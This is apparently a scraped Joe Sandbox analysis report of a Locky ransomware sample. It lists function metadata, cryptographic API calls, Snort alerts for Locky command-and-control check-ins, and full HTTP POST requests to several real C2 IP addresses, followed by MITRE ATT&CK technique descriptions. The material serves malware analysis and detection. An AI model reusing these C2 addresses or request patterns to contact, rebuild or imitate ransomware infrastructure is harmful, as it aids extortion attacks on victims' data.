Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: aa6c8fb5141acce896444a95084e82b665b59e23b3859a5b08fa5826d767e363
Instruction ID: f9f863fc5e82b23fca740ebb8c40701652daf8acc41f5bbc9522af8665fdf56f
Opcode Fuzzy Hash: aa6c8fb5141acce896444a95084e82b665b59e23b3859a5b08fa5826d767e363
Instruction Fuzzy Hash: 2EF04F7128F109DBC610DE4084809F0732CDB573507B3659BC85E16056D76CE5DBB68F

Function 00408DE9 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00408E0F

Part of subcall function 00408C3B: __fltout2.LIBCMT ref: 00408C66

__cftog_l.LIBCMT ref: 00408E35
__cftoe_l.LIBCMT ref: 00408E67

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 4408a756589c9fadbc31580a9a9a4869e6530ccb00210a12d1a1f0adf1f70493
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: B811593200014DBBCF166E85CD05CEF3F32BB18354B55842AFEA8A5171CB3AC971AB85

Function 004031F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00401759: __getptd.LIBCMT ref: 0040175F
Part of subcall function 00401759: __getptd.LIBCMT ref: 0040176F

__getptd.LIBCMT ref: 00403207

Part of subcall function 00403C2B: __getptd_noexit.LIBCMT ref: 00403C2E
Part of subcall function 00403C2B: __amsg_exit.LIBCMT ref: 00403C3B

__getptd.LIBCMT ref: 00403215

Strings

csm, xrefs: 00403223

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: efe9c139ac2c0d2a090874f0b752b7ce5552c5c7971c898fefea78e5574cc2be
Instruction ID: 1d0513889adda708dedb3d3e56b4133650a2833bba4696e27e11937c47fa3a6d
Opcode Fuzzy Hash: efe9c139ac2c0d2a090874f0b752b7ce5552c5c7971c898fefea78e5574cc2be
Instruction Fuzzy Hash: 35014F359043098BCF35AF79D44466EBBB9AF10316F64497FE441BA6D1CB388A81CF09

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA,	0_2_00415310
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey,	0_2_00416170
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004193D8 CryptReleaseContext,	0_2_004193D8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8D0 CryptReleaseContext,	0_2_0040F8D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F890 CryptReleaseContext,	0_2_0040F890
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8B8 CryptReleaseContext,	0_2_0040F8B8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError,	0_2_0040F980
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB50 CryptDestroyKey,	0_2_0040FB50
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB10 CryptDestroyKey,	0_2_0040FB10
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError,	0_2_0040FBF0

Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80

Source: Joe Sandbox View	ASN Name: ASBAXETRU ASBAXETRU
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View	ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Source: Joe Sandbox View	ASN Name: WEBHOST1-ASRU WEBHOST1-ASRU

Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.183.165.45/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.183.165.45Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LockyRansom.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

System Behavior

Windows Analysis Report
LockyRansom.exe

Function 005C007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Function 00415410 Relevance: 6.1, APIs: 4, Instructions: 146
encryptionCOMMON

Function 0041544C Relevance: 6.1, APIs: 4, Instructions: 119
encryptionCOMMON

Function 00415310 Relevance: 4.6, APIs: 3, Instructions: 109
encryptionCOMMON

Function 005C01C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
librarymemoryloaderCOMMON

Function 0040347F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Function 005C01F3 Relevance: 4.6, APIs: 3, Instructions: 54
librarymemoryloaderCOMMON

Function 0042B880 Relevance: 3.1, APIs: 2, Instructions: 79
COMMON

Function 005C0605 Relevance: 2.3, APIs: 1, Instructions: 1066
memoryCOMMON

Function 004221DB Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 00419717 Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 00690000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 005C05EF Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON